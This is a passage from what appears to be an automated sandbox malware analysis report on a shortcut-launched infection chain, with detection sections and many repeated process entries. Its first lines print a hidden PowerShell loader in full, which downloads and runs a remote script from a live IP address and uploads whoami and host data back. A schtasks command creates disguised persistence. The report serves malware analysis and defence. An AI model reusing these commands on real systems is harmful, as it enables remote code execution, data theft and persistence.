              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c $iik=new-object net.webclient;$flm=$iik.downloaddata('http://147.78.46.40:37662/xsSpQbSOGHyzMLxZ/page164/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$bjdo+=IEX $jkr|out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};$ujk=new-object net.webclient;$ujk.uploaddata('http://147.78.46.40:43891/page164',$drpy);}
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c $iik=new-object net.webclient;$flm=$iik.downloaddata('http://147.78.46.40:37662/xsSpQbSOGHyzMLxZ/page164/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$bjdo+=IEX $jkr|out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};$ujk=new-object net.webclient;$ujk.uploaddata('http://147.78.46.40:43891/page164',$drpy);}Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD347900BD pushad ; iretd 0_2_00007FFD347900C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFD343300BD pushad ; iretd 14_2_00007FFD343300C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFD344061FE push cs; ret 14_2_00007FFD3440621F

              Persistence and Installation Behavior

              barindex
              Windows shortcut file (LNK) starts blacklisted processes
              Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior

              Boot Survival

              barindex
              Uses schtasks.exe or at.exe to add and modify task schedules
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f

              Hooking and other Techniques for Hiding and Protection

              barindex
              Uses known network protocols on non-standard ports
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 37662
              Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 37662
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
